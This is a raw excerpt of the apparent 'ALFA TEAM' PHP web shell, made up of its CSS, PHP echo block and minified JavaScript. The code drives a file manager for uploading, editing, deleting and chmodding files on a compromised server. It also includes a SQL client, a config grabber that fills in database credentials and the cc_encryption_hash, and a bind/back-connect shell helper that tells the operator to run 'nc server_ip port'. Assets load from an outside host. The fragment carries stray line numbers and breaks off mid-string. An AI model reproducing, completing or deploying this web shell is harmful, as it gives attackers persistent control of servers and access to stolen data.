.sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}
1070<?php echo '
1071@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
1072@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
1073@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
1074@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
1075#alfaloader{'.$csscode.'width:100px;height:100px;}
1076#a_loader img{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
1077.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
1078.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}'.alfaCssLoadColors().'
1079</style>';
1080echo "<script type='text/javascript'>
1081var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
1082var a_ = '" . htmlspecialchars(@$_POST['a']) ."';
1083var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
1084var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
1085var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";";?>
1086var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&path="+c_+"&file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"¤t_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font 